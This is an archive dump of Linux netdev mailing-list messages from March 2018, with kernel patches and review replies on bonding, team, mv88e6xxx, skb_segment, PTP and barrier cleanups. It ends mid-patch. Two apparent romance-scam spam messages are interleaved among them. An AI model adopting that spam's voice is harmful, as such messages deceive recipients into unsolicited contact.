From: Lucas Bates Date: Thu, 22 Mar 2018 15:14:58 -0400 > On Thu, Mar 22, 2018 at 2:48 PM, David Miller wrote: >> From: Lucas Bates >> Date: Wed, 21 Mar 2018 11:49:40 -0400 >> >>> } >>> -] >>> \ No newline at end of file >>> +] >>> -- >>> 2.7.4 >> >> Please fix this. > > This patch fixes the gact.json file that had no newline on the end. Sorry about that, please repost. Thank you.
Re: [RESEND PATCH net-next 1/1] tc-testing: updated police, mirred, skbedit and skbmod with more tests
From: Roman Mashak Date: Thu, 22 Mar 2018 15:29:36 -0400 > David Miller writes: > >> From: Roman Mashak >> Date: Thu, 22 Mar 2018 08:23:22 -0400 >> >>> diff --git >>> a/tools/testing/selftests/tc-testing/tc-tests/actions/skbmod.json >>> b/tools/testing/selftests/tc-testing/tc-tests/actions/skbmod.json >>> index 90bba48c3f07..8aa5a88ccb19 100644 >>> --- a/tools/testing/selftests/tc-testing/tc-tests/actions/skbmod.json >>> +++ b/tools/testing/selftests/tc-testing/tc-tests/actions/skbmod.json >> ... >>> ] >>> } >>> -] >>> +] >>> \ No newline at end of file >>> -- >>> 2.7.4 >> >> Please fix this. > > The patch updates police.json, mirred.json, skbedit.json and > skbmod.json files that initially had no newline on the end. My bad, please repost the patch and I'll apply it. Thank you.
Re: [PATCH] of_net: Implement of_get_nvmem_mac_address helper
> I have no experience with Coccinelle though. Hi Mike I've very little either. But all the interactions i've had with Coccinelle people have been very friendly and helpful. It could be, if you can describe in words what you need help with, they can write the script to do it. Andrew
[PATCH v2 net-next 0/2] Fixes to allow mv88e6xxx module to be reloaded
As reported by Uwe Kleine-Künig, the interrupt trigger is first configured by DT and then reconfigured to edge. This results in a failure on EPROBE_DEFER, or if the module is unloaded and reloaded. A second crash happens on module reload due to a missing call to the common IRQ free code when using polled interrupts. With these fixes in place, it becomes possible to load and unload the kernel modules a few times without it crashing. v2: Fix the ü in Künig a couple of times Andrew Lunn (2): net: dsa: mv88e6xxx: Use the DT IRQ trigger mode net: dsa: mv88e6xxx: Call the common IRQ free code drivers/net/dsa/mv88e6xxx/chip.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) -- 2.16.2
[PATCH v2 net-next 2/2] net: dsa: mv88e6xxx: Call the common IRQ free code
When free'ing the polled IRQs, call the common irq free code. Otherwise the interrupts are left registered, and when we come to load the driver a second time, we get an Opps. Signed-off-by: Andrew Lunn --- drivers/net/dsa/mv88e6xxx/chip.c | 2 ++ 1 file changed, 2 insertions(+) diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c index 3ba77067a3dc..9a5d786b4885 100644 --- a/drivers/net/dsa/mv88e6xxx/chip.c +++ b/drivers/net/dsa/mv88e6xxx/chip.c @@ -467,6 +467,8 @@ static int mv88e6xxx_irq_poll_setup(struct mv88e6xxx_chip *chip) static void mv88e6xxx_irq_poll_free(struct mv88e6xxx_chip *chip) { + mv88e6xxx_g1_irq_free_common(chip); + kthread_cancel_delayed_work_sync(&chip->irq_poll_work); kthread_destroy_worker(chip->kworker); } -- 2.16.2
[PATCH v2 net-next 1/2] net: dsa: mv88e6xxx: Use the DT IRQ trigger mode
By calling request_threaded_irq() with the flag IRQF_TRIGGER_FALLING we override the trigger mode provided in device tree. And the interrupt is actually active low, which is what all the current device tree descriptions use. Suggested-by: Uwe Kleine-Künig Signed-off-by: Andrew Lunn --- v2: Fix the ü in Künig --- drivers/net/dsa/mv88e6xxx/chip.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c index fd78378ad6b1..3ba77067a3dc 100644 --- a/drivers/net/dsa/mv88e6xxx/chip.c +++ b/drivers/net/dsa/mv88e6xxx/chip.c @@ -425,7 +425,7 @@ static int mv88e6xxx_g1_irq_setup(struct mv88e6xxx_chip *chip) err = request_threaded_irq(chip->irq, NULL, mv88e6xxx_g1_irq_thread_fn, - IRQF_ONESHOT | IRQF_TRIGGER_FALLING, + IRQF_ONESHOT, dev_name(chip->dev), chip); if (err) mv88e6xxx_g1_irq_free_common(chip); -- 2.16.2
Re: [v2] vhost: add vsock compat ioctl
From: Stefan Hajnoczi Date: Thu, 22 Mar 2018 09:25:35 + > On Fri, Mar 16, 2018 at 7:30 PM, David Miller wrote: >> Although the top level ioctls are probably size and layout compatible, >> I do not think that the deeper ioctls can be called by compat binaries >> without some translations in order for them to work. > > I audited the vhost ioctl code when reviewing this patch and was > unable to find anything that would break for a 32-bit userspace > process. > > drivers/vhost/net.c does the same thing already, which doesn't prove > it's correct but makes me more confident I didn't miss something while > auditing the vhost ioctl code. > > Did you have a specific ioctl in mind? I walked over the vhost ioctl datastructures and they all appear like they should be compatible. So I guess it won't be a problem after all.
Re: [PATCH net-next v6 0/2] net: permit skb_segment on head_frag frag_list skb
From: Yonghong Song Date: Wed, 21 Mar 2018 16:31:02 -0700 > One of our in-house projects, bpf-based NAT, hits a kernel BUG_ON at > function skb_segment(), line 3667. The bpf program attaches to > clsact ingress, calls bpf_skb_change_proto to change protocol > from ipv4 to ipv6 or from ipv6 to ipv4, and then calls bpf_redirect > to send the changed packet out. > ... > 3665 while (pos < offset + len) { > 3666 if (i >= nfrags) { > 3667 BUG_ON(skb_headlen(list_skb)); > ... > > The triggering input skb has the following properties: > list_skb = skb->frag_list; > skb->nfrags != NULL && skb_headlen(list_skb) != 0 > and skb_segment() is not able to handle a frag_list skb > if its headlen (list_skb->len - list_skb->data_len) is not 0. > > Patch #1 provides a simple solution to avoid BUG_ON. If > list_skb->head_frag is true, its page-backed frag will > be processed before the list_skb->frags. > Patch #2 provides a test case in test_bpf module which > constructs a skb and calls skb_segment() directly. The test > case is able to trigger the BUG_ON without Patch #1. > > The patch has been tested in the following setup: > ipv6_host <-> nat_server <-> ipv4_host > where nat_server has a bpf program doing ipv4<->ipv6 > translation and forwarding through clsact hook > bpf_skb_change_proto. Series applied, however I'm still not %100 convinced that allowing this kind of protocol and MSS sized mucked GRO packet is a good idea.
hallo Schönheit
Es ist mir eine Freude, Sie kennenzulernen. Mein Name ist Wesley, ich komme aus dem Vereinigten Staaten von Amerika. Ich bin ledig und nie verheiratet. Ich werde mich gerne mit Ihnen bekannt machen, ich entschuldige mich für Ihre Privatsphäre. Ich hoffe, Sie werden freundlich sein genug, um mir mehr über dich zu erzählen, wenn es dir nichts ausmacht. Hoffe bald von dir zu hören. Grüße, Wesley.
Re: [PATCH net-next 5/6] r8169: change type of driver_data
From: Heiner Kallweit Date: Sat, 24 Mar 2018 23:18:25 +0100 > Several functions accessing the device driver_data field don't need the > net_device. All needed parameters can be accessed via struct > rtl8169_private, therefore change type of driver_data accordingly. > > Signed-off-by: Heiner Kallweit This doesn't work. The pci_set_drvdata() call happens after register_netdevice(). At the exact moment register_netdevice() is called, any part of the driver can be invoked before it returns. Therefore this change will result in crashes because the drvdata won't be initialized early enough. I really think you're taking things too far with the cleanups of this driver. It is a reasonably old driver used by a lot of people, and I think avoiding regressions is 1000 times more important than "streamlining" control plane functions that have not effect whatsoever on real driver performance. Thank you.
Re: [net-next 00/12][pull request] 10GbE Intel Wired LAN Driver Updates 2018-03-23
From: Jeff Kirsher Date: Fri, 23 Mar 2018 16:16:19 -0700 > This series contains updates to ixgbe and ixgbevf only. ... > Tony provides the much anticipated XDP support for ixgbevf. Currently, > pass, drop and XDP_TX actions are supported, as well as meta data and > stats reporting. W00t! > Björn Töpel tweaks the page counting for XDP_REDIRECT, since a page can > have its reference count decreased via the xdp_do_redirect() call. > > The following are changes since commit > f452518c982e57538e6d49da0a2c80eef22087ab: > net: phy: intel-xway: add VR9 v1.1 phy ids > and are available in the git repository at: > git://git.kernel.org/pub/scm/linux/kernel/git/jkirsher/next-queue 10GbE Pulled, thanks Jeff.
Re: [PATCH v7 6/7] bnxt_en: Eliminate duplicate barriers on weakly-ordered archs
On Sun, Mar 25, 2018 at 7:39 AM, Sinan Kaya wrote: > Code includes wmb() followed by writel(). writel() already has a barrier on > some architectures like arm64. > > This ends up CPU observing two barriers back to back before executing the > register write. > > Create a new wrapper function with relaxed write operator. Use the new > wrapper when a write is following a wmb(). > > Since code already has an explicit barrier call, changing writel() to > writel_relaxed(). > > Also add mmiowb() so that write code doesn't move outside of scope. This line in the patch description is not needed anymore. Other than that, Acked-by: Michael Chan Thanks. > > Signed-off-by: Sinan Kaya
Re: [PATCH net-next 00/13] liquidio: Tx queue cleanup
From: Felix Manlunas Date: Fri, 23 Mar 2018 17:36:18 -0700 > From: Intiyaz Basha > > Moved some common function to octeon_network.h > Removed some unwanted functions and checks. Series applied, thanks.
Re: [PATCH RFC net-next 7/7] netdevsim: Add simple FIB resource controller via devlink
On Sun, 25 Mar 2018 08:27:42 -0600, David Ahern wrote: > On 3/25/18 12:35 AM, Jakub Kicinski wrote: > > On Sat, 24 Mar 2018 09:02:45 -0600, David Ahern wrote: > diff --git a/drivers/net/netdevsim/Makefile > b/drivers/net/netdevsim/Makefile > index 09388c06171d..449b2a1a1800 100644 > --- a/drivers/net/netdevsim/Makefile > +++ b/drivers/net/netdevsim/Makefile > @@ -9,3 +9,7 @@ ifeq ($(CONFIG_BPF_SYSCALL),y) > netdevsim-objs += \ > bpf.o > endif > + > +ifneq ($(CONFIG_NET_DEVLINK),) > >>> > >>> Hm. Don't you need MAY_USE_DEVLINK dependency perhaps? > >> > >> mlxsw uses CONFIG_NET_DEVLINK in its Makefile. > >> > >> MAY_USE_DEVLINK seems to only be used in Kconfig files. Not clear to me > >> why it is needed at all. > > > > NETDEVSIM=y && DEVLINK=m > > > > ok. I purposely did not add DEVLINK as a dependency to netdevsim to make > the resource controller truly optional. Can add it if you prefer. Oh, no, I don't mind. I just thought NETDEVSIM=y DEVLINK=m case will break the build, but I haven't tested. If it works perfect, let's not add unnecessary dependencies :) (FWIW the MAY_USE_DEVLINK dep is basically depend on DEVLINK || DEVLINK=n, so one can still build without devlink but if devlink is a module netdevsim will also have to be.)
[PATCH net] team: move dev_mc_sync after master_upper_dev_link in team_port_add
The same fix as in 'bonding: move dev_mc_sync after master_upper_dev_link in bond_enslave' is needed for team driver. The panic can be reproduced easily: ip link add team1 type team ip link set team1 up ip link add link team1 vlan1 type vlan id 80 ip link set vlan1 master team1 Fixes: cb41c997d444 ("team: team should sync the port's uc/mc addrs when add a port") Signed-off-by: Xin Long --- drivers/net/team/team.c | 12 +--- 1 file changed, 5 insertions(+), 7 deletions(-) diff --git a/drivers/net/team/team.c b/drivers/net/team/team.c index 56c701b..befed2d 100644 --- a/drivers/net/team/team.c +++ b/drivers/net/team/team.c @@ -1197,11 +1197,6 @@ static int team_port_add(struct team *team, struct net_device *port_dev) goto err_dev_open; } - netif_addr_lock_bh(dev); - dev_uc_sync_multiple(port_dev, dev); - dev_mc_sync_multiple(port_dev, dev); - netif_addr_unlock_bh(dev); - err = vlan_vids_add_by_dev(port_dev, dev); if (err) { netdev_err(dev, "Failed to add vlan ids to device %s\n", @@ -1241,6 +1236,11 @@ static int team_port_add(struct team *team, struct net_device *port_dev) goto err_option_port_add; } + netif_addr_lock_bh(dev); + dev_uc_sync_multiple(port_dev, dev); + dev_mc_sync_multiple(port_dev, dev); + netif_addr_unlock_bh(dev); + port->index = -1; list_add_tail_rcu(&port->list, &team->port_list); team_port_enable(team, port); @@ -1265,8 +1265,6 @@ static int team_port_add(struct team *team, struct net_device *port_dev) vlan_vids_del_by_dev(port_dev, dev); err_vids_add: - dev_uc_unsync(port_dev, dev); - dev_mc_unsync(port_dev, dev); dev_close(port_dev); err_dev_open: -- 2.1.0
[PATCH net 2/3] bonding: move dev_mc_sync after master_upper_dev_link in bond_enslave
Beniamino found a crash when adding vlan as slave of bond which is also the parent link: ip link add bond1 type bond ip link set bond1 up ip link add link bond1 vlan1 type vlan id 80 ip link set vlan1 master bond1 The call trace is as below: [] queued_spin_lock_slowpath+0xb/0xf [] _raw_spin_lock+0x20/0x30 [] dev_mc_sync+0x37/0x80 [] vlan_dev_set_rx_mode+0x1c/0x30 [8021q] [] __dev_set_rx_mode+0x5a/0xa0 [] dev_mc_sync_multiple+0x78/0x80 [] bond_enslave+0x67c/0x1190 [bonding] [] do_setlink+0x9c9/0xe50 [] rtnl_newlink+0x522/0x880 [] rtnetlink_rcv_msg+0xa7/0x260 [] netlink_rcv_skb+0xab/0xc0 [] rtnetlink_rcv+0x28/0x30 [] netlink_unicast+0x170/0x210 [] netlink_sendmsg+0x308/0x420 [] sock_sendmsg+0xb6/0xf0 This is actually a dead lock caused by sync slave hwaddr from master when the master is the slave's 'slave'. This dead loop check is actually done by netdev_master_upper_dev_link. However, Commit 1f718f0f4f97 ("bonding: populate neighbour's private on enslave") moved it after dev_mc_sync. This patch is to fix it by moving dev_mc_sync after master_upper_dev_link, so that this loop check would be earlier than dev_mc_sync. It also moves if (mode == BOND_MODE_8023AD) into if (!bond_uses_primary) clause as an improvement. Note team driver also has this issue, I will fix it in another patch. Fixes: 1f718f0f4f97 ("bonding: populate neighbour's private on enslave") Reported-by: Beniamino Galvani Signed-off-by: Xin Long --- drivers/net/bonding/bond_main.c | 73 - 1 file changed, 35 insertions(+), 38 deletions(-) diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c index 0c299de..55e1985 100644 --- a/drivers/net/bonding/bond_main.c +++ b/drivers/net/bonding/bond_main.c @@ -1528,44 +1528,11 @@ int bond_enslave(struct net_device *bond_dev, struct net_device *slave_dev, goto err_close; } - /* If the mode uses primary, then the following is handled by -* bond_change_active_slave(). -*/ - if (!bond_uses_primary(bond)) { - /* set promiscuity level to new slave */ - if (bond_dev->flags & IFF_PROMISC) { - res = dev_set_promiscuity(slave_dev, 1); - if (res) - goto err_close; - } - - /* set allmulti level to new slave */ - if (bond_dev->flags & IFF_ALLMULTI) { - res = dev_set_allmulti(slave_dev, 1); - if (res) - goto err_close; - } - - netif_addr_lock_bh(bond_dev); - - dev_mc_sync_multiple(slave_dev, bond_dev); - dev_uc_sync_multiple(slave_dev, bond_dev); - - netif_addr_unlock_bh(bond_dev); - } - - if (BOND_MODE(bond) == BOND_MODE_8023AD) { - /* add lacpdu mc addr to mc list */ - u8 lacpdu_multicast[ETH_ALEN] = MULTICAST_LACPDU_ADDR; - - dev_mc_add(slave_dev, lacpdu_multicast); - } - res = vlan_vids_add_by_dev(slave_dev, bond_dev); if (res) { netdev_err(bond_dev, "Couldn't add bond vlan ids to %s\n", slave_dev->name); - goto err_hwaddr_unsync; + goto err_close; } prev_slave = bond_last_slave(bond); @@ -1725,6 +1692,37 @@ int bond_enslave(struct net_device *bond_dev, struct net_device *slave_dev, goto err_upper_unlink; } + /* If the mode uses primary, then the following is handled by +* bond_change_active_slave(). +*/ + if (!bond_uses_primary(bond)) { + /* set promiscuity level to new slave */ + if (bond_dev->flags & IFF_PROMISC) { + res = dev_set_promiscuity(slave_dev, 1); + if (res) + goto err_sysfs_del; + } + + /* set allmulti level to new slave */ + if (bond_dev->flags & IFF_ALLMULTI) { + res = dev_set_allmulti(slave_dev, 1); + if (res) + goto err_sysfs_del; + } + + netif_addr_lock_bh(bond_dev); + dev_mc_sync_multiple(slave_dev, bond_dev); + dev_uc_sync_multiple(slave_dev, bond_dev); + netif_addr_unlock_bh(bond_dev); + + if (BOND_MODE(bond) == BOND_MODE_8023AD) { + /* add lacpdu mc addr to mc list */ + u8 lacpdu_multicast[ETH_ALEN] = MULTICAST_LACPDU_ADDR; + + dev_mc_add(slave_dev, lacpdu_multicast); + } + } + bond->slave_cnt++; bond_compute_features(bond); bond_set_carrier(bond); @@ -1748,6 +1746,9 @@ int bond_enslave(struct net_device *bond_dev, stru
[PATCH net 3/3] bonding: process the err returned by dev_set_allmulti properly in bond_enslave
When dev_set_promiscuity(1) succeeds but dev_set_allmulti(1) fails, dev_set_promiscuity(-1) should be done before going to the err path. Otherwise, dev->promiscuity will leak. Fixes: 7e1a1ac1fbaa ("bonding: Check return of dev_set_promiscuity/allmulti") Signed-off-by: Xin Long --- drivers/net/bonding/bond_main.c | 5 - 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c index 55e1985..b7b1130 100644 --- a/drivers/net/bonding/bond_main.c +++ b/drivers/net/bonding/bond_main.c @@ -1706,8 +1706,11 @@ int bond_enslave(struct net_device *bond_dev, struct net_device *slave_dev, /* set allmulti level to new slave */ if (bond_dev->flags & IFF_ALLMULTI) { res = dev_set_allmulti(slave_dev, 1); - if (res) + if (res) { + if (bond_dev->flags & IFF_PROMISC) + dev_set_promiscuity(slave_dev, -1); goto err_sysfs_del; + } } netif_addr_lock_bh(bond_dev); -- 2.1.0
[PATCH net 1/3] bonding: fix the err path for dev hwaddr sync in bond_enslave
vlan_vids_add_by_dev is called right after dev hwaddr sync, so on the err path it should unsync dev hwaddr. Otherwise, the slave dev's hwaddr will never be unsync when this err happens. Fixes: 1ff412ad7714 ("bonding: change the bond's vlan syncing functions with the standard ones") Signed-off-by: Xin Long --- drivers/net/bonding/bond_main.c | 9 + 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c index c669554..0c299de 100644 --- a/drivers/net/bonding/bond_main.c +++ b/drivers/net/bonding/bond_main.c @@ -1565,7 +1565,7 @@ int bond_enslave(struct net_device *bond_dev, struct net_device *slave_dev, if (res) { netdev_err(bond_dev, "Couldn't add bond vlan ids to %s\n", slave_dev->name); - goto err_close; + goto err_hwaddr_unsync; } prev_slave = bond_last_slave(bond); @@ -1755,9 +1755,6 @@ int bond_enslave(struct net_device *bond_dev, struct net_device *slave_dev, netdev_rx_handler_unregister(slave_dev); err_detach: - if (!bond_uses_primary(bond)) - bond_hw_addr_flush(bond_dev, slave_dev); - vlan_vids_del_by_dev(slave_dev, bond_dev); if (rcu_access_pointer(bond->primary_slave) == new_slave) RCU_INIT_POINTER(bond->primary_slave, NULL); @@ -1771,6 +1768,10 @@ int bond_enslave(struct net_device *bond_dev, struct net_device *slave_dev, synchronize_rcu(); slave_disable_netpoll(new_slave); +err_hwaddr_unsync: + if (!bond_uses_primary(bond)) + bond_hw_addr_flush(bond_dev, slave_dev); + err_close: slave_dev->priv_flags &= ~IFF_BONDING; dev_close(slave_dev); -- 2.1.0
[PATCH net 0/3] bonding: a bunch of fixes for dev hwaddr sync in bond_enslave
This patchset is mainly to fix a crash when adding vlan as slave of bond which is also the parent link in patch 2/3, and also fix some err process problems in bond_enslave in patch 1/3 and 3/3. Xin Long (3): bonding: fix the err path for dev hwaddr sync in bond_enslave bonding: move dev_mc_sync after master_upper_dev_link in bond_enslave bonding: process the err returned by dev_set_allmulti properly in bond_enslave drivers/net/bonding/bond_main.c | 73 + 1 file changed, 37 insertions(+), 36 deletions(-) -- 2.1.0
Re: [net-next 03/15] net/mlx5e: PFC stall prevention support
> > Shouldn't you map a value of MLX5E_PFC_PREVEN_AUTO_TOUT_MSEC back to > > PFC_STORM_PREVENTION_AUTO? > > We discussed this point internally, mapping MLX5E_PFC_PREVEN_AUTO_TOUT_MSEC > (100) to > PFC_STORM_PREVENTION_AUTO might cause confusion when the user explicitly asks > for 100msec timeout > and gets auto in his following query. > Also, this way the "auto" timeout is visible to the user, which might help > him get an initial > clue of which values are recommended. Yes, this is a fair point, which is why i asked the question. Either way, it can cause confusion. 'I configured it to auto, but it always returns 100, not auto.' Whatever is decided, it should be consistent across drivers. So please add some documentation to the ethtool header file about what is expected. Andrew
Re: [PATCH net-next RFC V1 5/5] net: mdio: Add a driver for InES time stamping IP core.
On Sat, Mar 24, 2018 at 09:51:52PM -0700, Richard Cochran wrote: > On Sat, Mar 24, 2018 at 07:48:58PM +0100, Andrew Lunn wrote: > > As far as i can see, you have three basic problems: > > > > 1) How do you associate the PTP device to the netdev? > > 2) How do you get the information you need to configure the PTP device > > Yes, yes. > > > 3) How do you limit the MAC/PHY to what the PTP device can do. > > Hm, I don't think this is important. So you are happy that the PTP device will cause the MC/PHY link to break down when it is asked to do something it cannot do? Take for example a Marvell MAC connected to a Marvell PHY doing 2.5Gbps SGMII because it can. But say the PTP device cannot be clocked that fast, and the MII links break You as a PTP maintainer might be happy with that, but as a PHY maintainer, i'm not too happy with this. > Right, so phylib can operate on phydev->attached_dev->mdiots; So first off, it is not an MDIO device. You current code is a horrible hack which gets a NACK. Use a phandle, and have of_mdiobus_register_phy() follow the phandle to get the device. To keep lifecycle issues simple, i would also keep it in phydev, not netdev. mdiots as a name is completely wrong. It is not an MDIO device. Maybe in the future some devices will be MDIO, or I2C, or SPI. Just call it ptpdev. This ptpdev needs to be control bus agnostic. You need a ptpdev core API exposing functions like ptpdev_hwtstamp, ptpdev_rxtstamp, ptpdev_txtstamp, ptpdev_link_change, which take a ptpdev. Have phy_link_change call ptpdev_link_change. You have the flexibility in that if in the future you do care that your ptpdev breaks the MAC-PHY link, you can add a ptpdev_validate_advertise, which allows the ptpdev to mask out link modes it does not support. Your ptp device, when probing needs to register with the ptpdev core, passing a generic ptpdev_ops for the operations its support. How it talks to the device, MMIO, SPI, I2C is hidden within the device driver. You can then clean up the code in timestamping.c. Code like: phydev = skb->dev->phydev; if (likely(phydev->drv->txtstamp)) { clone = skb_clone_sk(skb); if (!clone) return; phydev->drv->txtstamp(phydev, clone, type); } violates the layering, and the locking looks broken. Add a phy_txtstamp() call to phylib. It can then either call into the PHY driver, or use the call the ptpdev API, or -EOPNOTSUP. Andrew
Hello Beautiful
Hi Dear, my name is Jack and i am seeking for a relationship in which i will feel loved after a series of failed relationships. I am hoping that you would be interested and we could possibly get to know each other more if you do not mind. I am open to answering questions from you as i think my approach is a little inappropriate. Hope to hear back from you. Jack.
Re: [PATCH RFC net-next 1/7] net: Fix fib notifer to return errno
On Sun, Mar 25, 2018 at 08:00:19AM -0600, David Ahern wrote: > On 3/25/18 2:16 AM, Ido Schimmel wrote: > > On Thu, Mar 22, 2018 at 03:57:51PM -0700, David Ahern wrote: > >> Notifier handlers use notifier_from_errno to convert any potential error > >> to an encoded format. As a consequence the other side, call_fib_notifiers > >> in this case, needs to use notifier_to_errno to return the error from > >> the handler back to its caller. > >> > >> Signed-off-by: David Ahern > >> --- > >> net/core/fib_notifier.c | 5 - > >> 1 file changed, 4 insertions(+), 1 deletion(-) > >> > >> diff --git a/net/core/fib_notifier.c b/net/core/fib_notifier.c > >> index 5ace0705a3f9..14ba52ebe8c9 100644 > >> --- a/net/core/fib_notifier.c > >> +++ b/net/core/fib_notifier.c > >> @@ -21,8 +21,11 @@ EXPORT_SYMBOL(call_fib_notifier); > >> int call_fib_notifiers(struct net *net, enum fib_event_type event_type, > >> struct fib_notifier_info *info) > > > > There's another (less interesting case) - call_fib_notifier(), which is > > used to dump the FIB tables for the caller registering to the > > notification chain. > > > > For example, if you have a non-default FIB rule in the system and you > > modprobe mlxsw, you'll get a silent failure and routes will not be > > offloaded. On the other hand, I'm not sure we want to fail the module > > loading in such cases. > > right. In normal cases the driver is loaded to create the netdevices > long before any networking config is done. So it seems to me the use > case you refer to, some user would have go out of there way to create a > situation where they install config that is not supported by the driver. Yes. > > A possible solution is to have the driver emit a warning via extack for > > each route/rule being notified after the abort mechanism was triggered. > > extack is not available on module load. I'm aware. I meant that during module load we'll trigger the abort mechanism (due to an unsupported FIB rule for example), then when user configures additional routes and extack is available we'll emit a warning. > Per past discussions, something you suggested, we need a message for > "out-of-line" cases like this where a driver notifies userspace of a > problem. That's another possibility. We can implement both options to make it perfectly clear to users and daemons what's going on.
Re: [PATCH RFC v2 net-next 00/21] net/ipv6: Separate data structures for FIB and data path
On 3/24/18 9:59 AM, Ido Schimmel wrote: >> As you know, my preference is to move to nexthop objects (makes fib6_nh >> optional). I have IPv4 done; IPv6 requires this patch set. > > After going over your presentation [1] I was under the impression that > the fib6_info will be optional, not fib6_nh: "Idea is similar to adding > id to fib_info that is exposed to userspace. Subsequent routes pass id > to avoid fib_info overhead". Just using that as an analogy to explain the idea in terms of something that already exists. > > But I think misunderstood you. You want to introduce the nexthop API > that will allow you to have multiple fib6_info pointing to the same > fib6_nh? > > 1. http://vger.kernel.org/netconf2017_files/nexthop-objects.pdf > I see nexthop specs as device, gateway, lwtunnel_state and flags. That's the basic building block. A nexthop group is multiple nexthops where each nexthop in the group as its own weight. The fib_info struct has more than that -- data unrelated to a netxthop and is really a next level struct.
Re: [PATCH RFC v2 net-next 19/21] net/ipv6: separate handling of FIB entries from dst based routes
On 3/24/18 10:02 AM, Ido Schimmel wrote: >> >> ok, I'll take a look. I thought I verified both paths (fib6_info and >> dst) were freeing the metrics. > > I get this from kmemleak (applied your patchset on top of fe2d55d295cf): > > unreferenced object 0x88004e2c16c8 (size 96): > comm "systemd-network", pid 1255, jiffies 4295166424 (age 957.858s) > hex dump (first 32 bytes): > 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 > 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 > backtrace: > ip6_route_info_create (/net/ipv6/route.c:2849) > ip6_route_add (/net/ipv6/route.c:2975) > inet6_rtm_newroute (/net/ipv6/route.c:4357) > rtnetlink_rcv_msg (/net/core/rtnetlink.c:4643) > netlink_rcv_skb (/net/netlink/af_netlink.c:2445) > netlink_unicast (/net/netlink/af_netlink.c:1309 > /net/netlink/af_netlink.c:1334) > netlink_sendmsg (/net/netlink/af_netlink.c:1897) > sock_sendmsg (/net/socket.c:630 /net/socket.c:639) > SYSC_sendto (/net/socket.c:1748) > do_syscall_64 (/arch/x86/entry/common.c:287) > entry_SYSCALL_64_after_hwframe (/arch/x86/entry/entry_64.S:239) > 0x (/./include/asm-generic/sections.h:42) > Thanks for confirming. I'll take care of it.
[PATCH v7 5/7] net: qlge: Eliminate duplicate barriers on weakly-ordered archs
Code includes wmb() followed by writel(). writel() already has a barrier on some architectures like arm64. This ends up CPU observing two barriers back to back before executing the register write. Create a new wrapper function with relaxed write operator. Use the new wrapper when a write is following a wmb(). Signed-off-by: Sinan Kaya --- drivers/net/ethernet/qlogic/qlge/qlge.h | 16 drivers/net/ethernet/qlogic/qlge/qlge_main.c | 3 ++- 2 files changed, 18 insertions(+), 1 deletion(-) diff --git a/drivers/net/ethernet/qlogic/qlge/qlge.h b/drivers/net/ethernet/qlogic/qlge/qlge.h index 84ac50f..3e71b65 100644 --- a/drivers/net/ethernet/qlogic/qlge/qlge.h +++ b/drivers/net/ethernet/qlogic/qlge/qlge.h @@ -2185,6 +2185,22 @@ static inline void ql_write_db_reg(u32 val, void __iomem *addr) } /* + * Doorbell Registers: + * Doorbell registers are virtual registers in the PCI memory space. + * The space is allocated by the chip during PCI initialization. The + * device driver finds the doorbell address in BAR 3 in PCI config space. + * The registers are used to control outbound and inbound queues. For + * example, the producer index for an outbound queue. Each queue uses + * 1 4k chunk of memory. The lower half of the space is for outbound + * queues. The upper half is for inbound queues. + * Caller has to guarantee ordering. + */ +static inline void ql_write_db_reg_relaxed(u32 val, void __iomem *addr) +{ + writel_relaxed(val, addr); +} + +/* * Shadow Registers: * Outbound queues have a consumer index that is maintained by the chip. * Inbound queues have a producer index that is maintained by the chip. diff --git a/drivers/net/ethernet/qlogic/qlge/qlge_main.c b/drivers/net/ethernet/qlogic/qlge/qlge_main.c index 50038d9..8293c202 100644 --- a/drivers/net/ethernet/qlogic/qlge/qlge_main.c +++ b/drivers/net/ethernet/qlogic/qlge/qlge_main.c @@ -2700,7 +2700,8 @@ static netdev_tx_t qlge_send(struct sk_buff *skb, struct net_device *ndev) tx_ring->prod_idx = 0; wmb(); - ql_write_db_reg(tx_ring->prod_idx, tx_ring->prod_idx_db_reg); + ql_write_db_reg_relaxed(tx_ring->prod_idx, tx_ring->prod_idx_db_reg); + mmiowb(); netif_printk(qdev, tx_queued, KERN_DEBUG, qdev->ndev, "tx queued, slot %d, len %d\n", tx_ring->prod_idx, skb->len); -- 2.7.4
[PATCH v7 6/7] bnxt_en: Eliminate duplicate barriers on weakly-ordered archs
Code includes wmb() followed by writel(). writel() already has a barrier on some architectures like arm64. This ends up CPU observing two barriers back to back before executing the register write. Create a new wrapper function with relaxed write operator. Use the new wrapper when a write is following a wmb(). Since code already has an explicit barrier call, changing writel() to writel_relaxed(). Also add mmiowb() so that write code doesn't move outside of scope. Signed-off-by: Sinan Kaya --- drivers/net/ethernet/broadcom/bnxt/bnxt.c | 2 +- drivers/net/ethernet/broadcom/bnxt/bnxt.h | 9 + 2 files changed, 10 insertions(+), 1 deletion(-) diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c index 1500243..befb538 100644 --- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c +++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c @@ -1922,7 +1922,7 @@ static int bnxt_poll_work(struct bnxt *bp, struct bnxt_napi *bnapi, int budget) /* Sync BD data before updating doorbell */ wmb(); - bnxt_db_write(bp, db, DB_KEY_TX | prod); + bnxt_db_write_relaxed(bp, db, DB_KEY_TX | prod); } cpr->cp_raw_cons = raw_cons; diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.h b/drivers/net/ethernet/broadcom/bnxt/bnxt.h index 1989c47..5e453b9 100644 --- a/drivers/net/ethernet/broadcom/bnxt/bnxt.h +++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.h @@ -1401,6 +1401,15 @@ static inline u32 bnxt_tx_avail(struct bnxt *bp, struct bnxt_tx_ring_info *txr) ((txr->tx_prod - txr->tx_cons) & bp->tx_ring_mask); } +/* For TX and RX ring doorbells with no ordering guarantee*/ +static inline void bnxt_db_write_relaxed(struct bnxt *bp, void __iomem *db, 